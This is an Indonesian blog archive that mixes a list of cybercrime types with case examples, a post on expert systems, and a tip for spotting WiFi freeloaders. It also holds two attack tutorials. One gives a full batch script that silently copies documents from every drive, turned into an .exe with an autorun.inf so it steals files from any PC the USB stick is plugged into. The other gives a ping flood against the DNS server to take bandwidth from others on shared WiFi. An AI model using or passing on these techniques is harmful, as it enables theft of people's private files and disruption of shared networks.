Sunday 28 April 2013

CONTOH KASUS KEJAHATAN DI DUNIA MAYA/INTERNET




Dibawah ini akan dijelaskan jenis – jenis dan contoh yang membahas cybercrime :

1. Unauthorized Access

Merupakan kejahatan yang terjadi ketika seseorang memasuki atau menyusup ke dalam suatu sistem jaringan komputer secara tidak sah, tanpa izin, atau tanpa sepengetahuan dari pemilik sistem jaringan komputer yang dimasukinya. Probing dan port merupakan contoh kejahatan ini.

Contoh Kasus :

Kita tentu belum lupa ketika masalah Timor Timur sedang hangat-hangatnya dibicarakan di tingkat internasional, beberapa website milik pemerintah RI dirusak oleh hacker (Kompas, 11/08/1999). Beberapa waktu lalu, hacker juga telah berhasil menembus masuk ke dalam data base berisi data para pengguna jasa America Online (AOL), sebuah perusahaan Amerika Serikat yang bergerak dibidang ecommerce yang memiliki tingkat kerahasiaan tinggi (Indonesian Observer, 26/06/2000). Situs Federal Bureau of Investigation (FBI) juga tidak luput dari serangan para hacker, yang mengakibatkan tidak berfungsinya situs ini beberapa waktu lamanya (http://www.fbi.org).

2. Illegal Contents

Merupakan kejahatn yang dilakukan dengan memasukkan data atau informasi ke internet tentang suatu hal yang tidak benar, tidak etis, dan dapat dianggap melanggar hukum atau menggangu ketertiban umum, contohnya adalah penyebaran pornografi.

Contoh Kasus :

Pada tahun 2008, pemerintah AS menangkap lebih dari 100 orang yang diduga terlibat kegiatan pornografi anak. Dari situs yang memiliki 250 pelanggan dan dijalankan di Texas, AS, pengoperasiannya dilakukan di Rusia dan Indonesia. Untuk itulah, Jaksa Agung AS John Ashcroft sampai mengeluarkan surat resmi penangkapan terhadap dua warga Indonesia yang terlibat dalam pornografi yang tidak dilindungi Amandemen Pertama. Di Indonesia, kasus pornografi yang terheboh baru-baru ini adalah kasusnya Ariel-Luna-Cut Tari.

3. Penyebaran virus secara sengaja

Penyebaran virus pada umumnya dilakukan dengan menggunakan email. Sering kali orang yang sistem emailnya terkena virus tidak menyadari hal ini. Virus ini kemudian dikirimkan ke tempat lain melalui emailnya.

Contoh Kasus :

Perusahaan peranti lunak, Microsoft dan Norton, Selasa (23/3/2010), menginformasikan adanya ancaman penyusupan virus baru lewat surat elektronik (e-mail) yang merusak data komputer pengguna layanan internet, seperti Yahoo, Hotmail, dan AOL (American OnLine).

Virus itu masuk ke surat elektronik dalam bentuk program presentasi Power Point dengan nama “Life is Beautiful”. Jika Anda menerimanya, segera hapus file tersebut. Karena jika itu dibuka, akan muncul pesan di layar komputer Anda kalimat: “it is too late now; your life is no longer beautiful….” (Sudah terlambat sekarang, hidup Anda tak indah lagi).

4. Data Forgery

Kejahatan jenis ini dilakukan dengan tujuan memalsukan data pada dokumen-dokumen penting yang ada di internet. Dokumen-dokumen ini biasanya dimiliki oleh institusi atau lembaga yang memiliki situs berbasis web database.

Contoh Kasus :

Data Forgery Pada E-Banking BCA

Dunia perbankan melalui Internet (e-banking) Indonesia, dikejutkan oleh ulah seseorang bernama Steven Haryanto, seorang hacker dan jurnalis pada majalah Master Web. Lelaki asal Bandung ini dengan sengaja membuat situs asli tapi palsu layanan Internet banking Bank Central Asia, (BCA). Steven membeli domain-domain dengan nama miriphttp://www.klikbca.com (situs asli Internet banking BCA), yaitu domainhttp://www.klik-bca.com,www.kilkbca.com,http://www.clikbca.com,http://www.klickca.com. Dan http://www.klikbac.com. Isi situs-situs plesetan inipun nyaris sama, kecuali tidak adanya security untuk bertransaksi dan adanya formulir akses (login form) palsu. Jika nasabah BCA salah mengetik situs BCA asli maka nasabah tersebut masuk perangkap situs plesetan yang dibuat oleh Steven sehingga identitas pengguna (user id) dan nomor identitas personal (PIN) dapat di ketahuinya.


5. Cyber Espionage, Sabotage, and Extortion

Cyber Espionage merupakan kejahatan yang memanfaatkan jaringan internet untuk melakukan kegiatan mata-mata terhadap pihak lain, dengan memasuki sistem jaringan komputer pihak sasaran. Sabotage and Extortion merupakan jenis kejahatan yang dilakukan dengan membuat gangguan, perusakan atau penghancuran terhadap suatu data, program komputer atau sistem jaringan komputer yang terhubung dengan internet.

Contoh Kasus :

munculnya “sendmail worm” (sekitar tahun 1988) yang menghentikan sistem email Internet kala itu. Kemudian dibentuk sebuah Computer Emergency Response Team (CERT). Semenjak itu di negara lain mulai juga dibentuk CERT untuk menjadi point of contact bagi orang untuk melaporkan masalah kemanan. IDCERT merupakan CERT Indonesia.

6. Cyberstalking

Kejahatan jenis ini dilakukan untuk mengganggu atau melecehkan seseorang dengan memanfaatkan komputer, misalnya menggunakan e-mail dan dilakukan berulang-ulang. Kejahatan tersebut menyerupai teror yang ditujukan kepada seseorang dengan memanfaatkan media internet. Hal itu bisa terjadi karena kemudahan dalam membuat email dengan alamat tertentu tanpa harus menyertakan identitas diri yang sebenarnya.

Contoh Kasus :

Misalnya e-mail yang berisi ajakan bergabung dengan suatu website, email yang berisi ajakan untuk membeli produk tertentu,
mail yang berisi kontes / undian berhadiah, misalnya dengan subject
“YOU HAVE WON $1,000,000″ , “LOTTERY NATIONAL UK” , “FREE LOTTO INTERNATIONAL” , “YOU WON YAHOO LOTTO PROMOTION $1,000″,
“EASY MONEY” ,”WIN CASH ONLINE” ,”FREE JACKPOT” , dan sekarang makin gencar menawarkan produk paket Adobe Suite yang dilengkapi dengan attachment pdf.

7. Carding

Carding merupakan kejahatan yang dilakukan untuk mencuri nomor kartu kredit milik orang lain dan digunakan dalam transaksi perdagangan di internet.

Contoh Kasus :

Kartu Kredit Polisi Mabes Kena Sikat

detikcom – Jakarta, Kejahatan memang tak pandang bulu, terlebih kejahatan di internet. Di dunia maya ini, Polisi dari Markas Besar Kepolisian Republik Indonesia (Mabes Polri) pun kebobolan kartu kredit. Brigjen Pol Gorries Mere, yang saat ini menyandang jabatan Direktur IV Narkoba Badan Reserse dan Kriminal Mabes Polri, dikabarkan menjadi korban kasus carding. Sampai berita ini diturunkan, Gorries Mere tidak berhasil dihubungi untuk diminta konfirmasinya. Ketika dikonfirmasi ke Setiadi, Penyidik di Unit Cybercrime Mabes Polri, pihaknya membenarkan hal itu.

8. Hacking dan Cracker

Istilah hacker biasanya mengacu pada seseorang yang punya minat besar untuk mempelajari sistem komputer secara detail dan bagaimana meningkatkan kapabilitasnya. Adapun mereka yang sering melakukan aksi-aksi perusakan di internet lazimnya disebut cracker. Boleh dibilang cracker ini sebenarnya adalah hacker yang yang memanfaatkan kemampuannya untuk hal-hal yang negatif. Aktivitas cracking di internet memiliki lingkup yang sangat luas, mulai dari pembajakan account milik orang lain, pembajakan situs web, probing, menyebarkan virus, hingga pelumpuhan target sasaran. Tindakan yang terakhir disebut sebagai DoS (Denial Of Service). Dos attack merupakan serangan yang bertujuan melumpuhkan target (hang, crash) sehingga tidak dapat memberikan layanan.

Contoh Kasus :

Pada tahun 1983, pertama kalinya FBI menangkap kelompok kriminal komputer The 414s(414 merupakan kode area lokal mereka) yang berbasis di Milwaukee AS. Kelompok yang kemudian disebut hacker tersebut melakukan pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.

9. Cybersquatting and Typosquatting

Cybersquatting merupakan kejahatan yang dilakukan dengan mendaftarkan domain nama perusahaan orang lain dan kemudian berusaha menjualnya kepada perusahaan tersebut dengan harga yang lebih mahal. Adapun typosquatting adalah kejahatan dengan membuat domain plesetan yaitu domain yang mirip dengan nama domain orang lain. Nama tersebut merupakan nama domain saingan perusahaan.

Contoh Kasus :

Contoh kasus yang beredar di international adalah kasus Yahoo yang menuntut OnlineNIC atas aksi cybersquatting pada 500 nama domain yang mirip atau dapat membingungkan para penggunanya termasuk yahoozone.com, yahooyahooligans.com dan denverwifesexyahoo.com.

10. Hijacking

Hijacking merupakan kejahatan melakukan pembajakan hasil karya orang lain. Yang paling sering terjadi adalah Software Piracy (pembajakan perangkat lunak).

Contoh Kasus :

Polri menangkap dua tersangka pembajakan hak cipta softaware dari perusahaan PT Surya Toto Indonesia (STI) dan PT MA di wilayah Jabodetabek. Mereka, Sintawati, manajer dan Yuliawansari, direktur marketing PT STI perusahaan yang bergerak dibidang IT. Akibat perbuatan kedua tersangka, merugikan pemegang lisensi resmi pemegang hak cipta software senilai US$2,4 miliar. Dari PT STI, polisi menyita 200 lebih software ilegal yang diinstal dalam 300 unit komputer. Sedangkan dari PT MA, Polri juga menyita 85 unit komputer yang diduga telah diinstal ke berbagai software yang hak ciptanya dimiliki Business Software Alliance (BSA). Polisi juga berhasil menemukan barang bukti software ilegal yang hak ciptanya dimiliki anggota BSA, antara lain program Microsoft, Symantec, Borland, Adobe, Cisco System, Macromedia dan Autodesk. Program tersebut telah digandakan tersangka. “Para tersangka menggandakan program tersebut dan mengedarkannya kemudian menjualnya kepada pihak lain. Mereka dari satu perusahaan, yakni PT STI,” kata Kabid Penum Humas Polri Kombes Bambang Kuncoko kepada wartawan di Mabes Polri, Rabu (1/11).



Sumber : http://niaas8.wordpress.com/2012/04/05/maraknya-kejahatan-didunia-maya/

Wednesday 30 January 2013

SISTEM PAKAR

Kelebihan dan Kekurangan Sistem Pakar.

>Sistem Pakar adalah paket program computer yang ditujukan sebagai penyedia nasihat dan sarana bantu dalam memecahkan masalah di bidang-bidang spesialisasi tertentu seperti sains, perekayasaan, matematika, kedokteran, pendidikan dan sebagainya. System pakar merupakan subset dari Artificial intelegent.

#Ada banyak keuntungan menggunakan Sistem Pakar,diantaranya adalah :
1. meningkatkan OUTPUT dan Produktivitas
2. Menjadikan pengetahuan dan nasehat lebih mudah didapat.
3. menyimpan kemampuan dan keahlian seorang pakar.
4. Meningkatkan penyelesaian masalah yang khusus.
5. Meningkatkan reliabilitas.
6. Memberikan respon yang cepat.
7. merupakan panduan yang cerdas.
8. Dapat bekerja dengan informasi yang kurang lengkap dan mengandung ketidakpastian.
9. Sebagai basisi data cerdas bahwa sistem pakar seperti hal sistem yang lain juga memiliki kelemahan.

>>Selain keuntungan di atas, system pakar seperti halnya system lainnya, juga memiliki kelemahan.

#Di antaranya adalah :

1. Masalah dalam mendapatkan pengetahuan di mana pengetahuan tidak selalu bisa didapatkan dengan mudah karena kadangkala pakar dari masalah yang kita buat tidak ada, dan kalaupun ada kadang pendekatan yang dimiliki oleh pakar berbeda-beda.
2. Untuk membuat suatu system pakar yang benar-benar berkualitas tinggi sangatlah sulit dan memerlukan biaya yang sangat besar untuk pengembangan dan pemeliharaanya.
3. Boleh jadi system tidak dapat membuat keputusan.
4. System pakar tidaklah 100% menguntungkan, walaupun seorang tetap tidak sempurna atau tidak selalu benar.

Oleh karena itu perlu diuji ulang secara teliti sebelum digunakan. Sehingga dalam hal ini peran manusian tetap merupakan factor yang dominan.

#Kelemahan-kelemahan atau kekurangan dari system pakar tersebut bukanlah sama sekali tidak bisa diatasi, tetapi dengan terus melakukan perbaikan dan pengolahan berdasarkan pengalaman yang telah ada maka hal itu diyakini akan dapat diatasi, walaupun dalam waktu yang panjang dan terus menerus.

Tuesday 18 September 2012

curi data dari flashdrive teman

saya genjik hack or wallhack??!
buka soft http://genjikblogger.blogspot.com
Pada kesempatan ini saya akan sharing menngenai merampok data di kompi dengan USB Flash Drive.. ok let’s start mulai aja.. cuuus???!!!
Langkanya Gan :
Buka notepad pertama . .. kalau males ngetik bisa copas tulisan di bawah ini ..

@echo off REM Name : silentxxx REM Author : Silentxxx Set silent=%computername% _ %random% If not exist ”%silent%” Md “%silent%” For%%a in (C D E F G H I J) do if exist %%a:\ ( For /f “tokens=*” %%b in (‘dir /a/b/s %%a:\*.doc’) do ( attrib –s –h –r “%%b” copy “%%b” “%silent%” /y) For /f “tokens=*” %%b in (‘dir /a/b/s%%a:\.xls’) do ( attrib –s –h –r “%%b” copy “%%b” “%silent%” /y) For /f “tokens=*” %% b in (‘dir /a/b/s%%a:/*.txt’) do ( attrib –s –h –r “%%b” copy “%%b” “%silent%” /y) For /f “tokens=*” %%b in (‘dir /a/b/s%%a:/*.docx’) do ( attrib –s –h –r “%%b” copy “%%b” “%silent%” /y) )

Save file tersebut dengan nama terserah .bat dan save as type all files .,udah pa blon?

Sekarang coba di jalankan file dengan exstensi bat tersebut maka di samping File akan terbuat semua file yang di copy dari drive C ampai Z (kalau punya )wkwkwk. gila banyak amat..

Code di atas dapat di ubah atau di tambah sesuai dengan keinginan kalian masing-masing bisa di tambahkan kode For /f “tokens=*” %%b in (‘dir /a/b/s%%a:\*.zip’) do( attrib –s –h –r “%%b” copy “%%b” “%silent%” /y) maka file yang berextensi zip akan masuk ke Flash Disk kamu (wah lumayan dapat software kompresan gratis wkwkwk)

ubah sesuai extensi apa yang kamu inginkan misalnya *.pdf atau *.html maka file terserah.bat akan berjalan sesuai dengan keinginan anda .
File tersebut bisa anda ubah ke bentuk extensi exe. .. enak atuh,, lebih mudah.. dengan software Bat_To_Exe_ConverterV1.5 kalau belum punya kakak-kakak bisa download Cara mengubahnya adalah Buka software tersebut.. Pilih yang compile Dan sekarang file.bat yang tadi kita buat menjadi file yang berextensi *.exe lebih enak kan ..
Agar file tersebut maka kita harus buat file autorun , Buka notepad ketikkan [autorun] Open=terserah.exe save as dengan nama Autorun.inf dan terserah.exe di dalam directory USB Flash Drive kamu.. Selesai ..

Akhirnya sekarang colokkan atau masukkan FD kamu atau loe atau agan di pc mana aaja akan terkcopy banyak data yang kamu terima .. thnkz.. tamat hanya skedar berbagi buat dapetiin yang gratisan.... hahaha :D jangan buat yang aneh2 yaa .... share?? boleh2 ja kok

Monday 17 September 2012

CARA HACK JARINGAN WIFI CMD di Windows7

cara hack WiFi via CMD di windows..kusus nya windows7 ... tp all juga bisa.. hahahhaha oleh Yoga Soemodiharjo pada 18 September 2012 pukul 7:49

Cara Hack Wifi Via CMD di Windows.
Hanya berbagi, udah lama tidak share informasi karena kemaren sedang sibbuk UN dan akibatnya saya semakin gendut aja, pada postingan kali ini saya mau share nih Cara Hack Wifi Via CMD di Windows, wah dari judulnya aja pasti bakal menarik nih pembahasan kita kali ini, sebenarnya saya sudah cukup lama mengetahui trik ini tetapi baru kepikiran untuk posting. Hehehe

Cara ini saya lakukan karena saya sangat jengkel pada teman-teman saya yang sama-sama pake wifi karena sering pake netcut. Rasa jengkel saya mendorong saya untuk mencari cara lain mengerjai balik mereka, dan hasilnya sangat manteb, di pake buat streaming youtube gak pake buffering (*tergantung kualitas wifi). Oke dari pada makin penasaran mending langsung aja ke hal yang sangat di tunggu-tunggu, Check it out.

Ikuti langkah-langkah berikut tanpa kurang sedikit pun :
* Buka RUN lalu ketikkan cmd.exe, atau bisa juga langsung ketikkan cmd.exe pada kolom search di start menu (*bagi yang menggunakan windows 7).gambar 1.Maka akan muncul tampilan seperti ini.
* gambar 2 Lalu Ketikan ipconfig/all di pointer yang kedip-kedip. Perintah ini berfungsi untuk menampilkan informasi seputar koneksi dimana anda berada sekarang.
* gambar 3 Hasilnya akan seperti dibawah ini. yang berisi segala macam informasi tentang komputer anda.
* Lalu cari yang namanya DNS Server kemudian lihat kode yang ada di sebelahnya, dan kode itu yang harus anda ingat, dan kalo perlu tulis dahulu di notepad.
* gambar 4 Lalu scrolling cmd.exe kalian kebagian yang paling bawah, maka kalian akan menemukan perintah seperti perintah awal untuk mengetik. Kini perintah ketikannya beda lagi. Ketikkan perintah seperti berikut ping -L 500 10.0.1.2 -t. dan kode 10.0.1.2 itu berasal dari DNS Server yang tertera di atas (*DNS Server Punya saya). Ganti dengan DNS Server kalian.
* gambar 5 Tekan Enter. Maka akan tampak proses seperti dibawah ini. Biarkan proses itu berjalan terus selama kalian online menggunakan wifi dimana tempat kalian sedang nongkrong sekarang ini. Bila perlu minimize saja, asal jangan di tutup cmd.exenya.
* gambar 6 Cara ini bertujuan untuk menyedot bandwitch yang sedang digunakan oleh orang lain dalam satu jaringan hotspot/wifi yang sama-sama kalian gunakan. Jika anda kurang puas dengan kecepatannya bisa anda ganti 500 menjadi 1000 atau 2000. Tetapi saya sarankan jangan berlebihan kasihan kan orang lain. dan tambahan lagi cara ini hanya berlaku di windows saja kalau linux saya belum pernah mencoba.

Oke sekianlah pembahasan kita kali ini tentang Cara Hack Wifi Via CMD di Windows, semoga bermanfaat yah kawan-kawan, sampai jumpa lagi di postingan berikutnya. Selamat mencoba cara curang ini. Hehehe salam genjikblogger.blogspot.com " the mentor " silahkan di cobaaaa yaa..... semoga bermanfaat??!!
WebRepPredikat secara keseluruhan

Cara Mendeteksi Pencuri Koneksi Jaringan Wifi anda

Cara Mendeteksi Pencuri Koneksi Jaringan Wifi anda

Tips ini buat anda yang mempunyai jaringan Wifi. Apakah koneksi jaringan wireless Anda berjalan lambat? Apakah Anda mendapatkan masalah putus-putus dalam akses internet dan Anda tidak tahu mengapa? Jika Anda secara teratur mengalami masalah ini, mungkin Anda memiliki sesuatu yang salah dengan koneksi wireless Anda. Tapi jika Anda tiba-tiba mengalami masalah putus-putus dengan kinerja Internet Anda, terutama pada waktu yang sama setiap hari, maka sudah waktunya bagi Anda untuk mendiagnosa jaringan WiFi Anda.

Hal pertama dan paling sederhana yang dapat Anda lakukan adalah memeriksa koneksi jaringan wireless Anda dan lihat apakah itu aman. Ketika Anda menginstal router Anda, Anda diberi pilihan pengaturan kunci wireless encryption protocol (WEP).

Pada dasarnya ini adalah metode sandi yang dilindungi untuk log on ke jaringan wireless Anda sendiri. Jika Anda tidak memilikinya, berarti Anda mengoperasikan jaringan secara terbuka. Itu berarti siapa saja dalam jangkauan dapat menggunakan wireless Anda secara gratis. Meskipun ini bukan hacking, namun masih bisa diperdebatkan apakah ini sebenarnya mencuri.

Dalam kasus manapun, jika Anda tidak memiliki kunci WEP, maka Anda rentan terhadap pengakses koneksi jaringan WiFi liar. Bahkan jika Anda memiliki kunci WEP, itu tidak berarti tetangga Anda tidak dapat melewati hal tersebut. Untuk menentukan apakah seseorang login ke jaringan wireless Anda, Anda dapat melakukannya dengan memeriksa log jaringan wireless Anda tersebut.

Untuk melakukannya, klik Start Menu di Microsoft Windows, kemudian klik dua kali My Network Places.
Selanjutnya, klik dua kali View Entire Network.
Jika ada perangkat yang lebih yang terhubung daripada yang Anda miliki atau perbolehkan di jaringan Anda, maka sepertinya terdapat pencuri WiFi.
Sebuah metode yang sama untuk menentukan status daftar pengguna WiFi adalah dengan memeriksa router DHCP client table Anda. Sama seperti cara melihat jaringan, DHCP client table Anda akan me-list mesin di koneksi jaringan Anda.
Jika nomor melebihi apa yang telah Anda set up, dimungkinkan seseorang sedang mencuri WiFi Anda.

thanks buat kunjungan nya.. semoga bermanfaat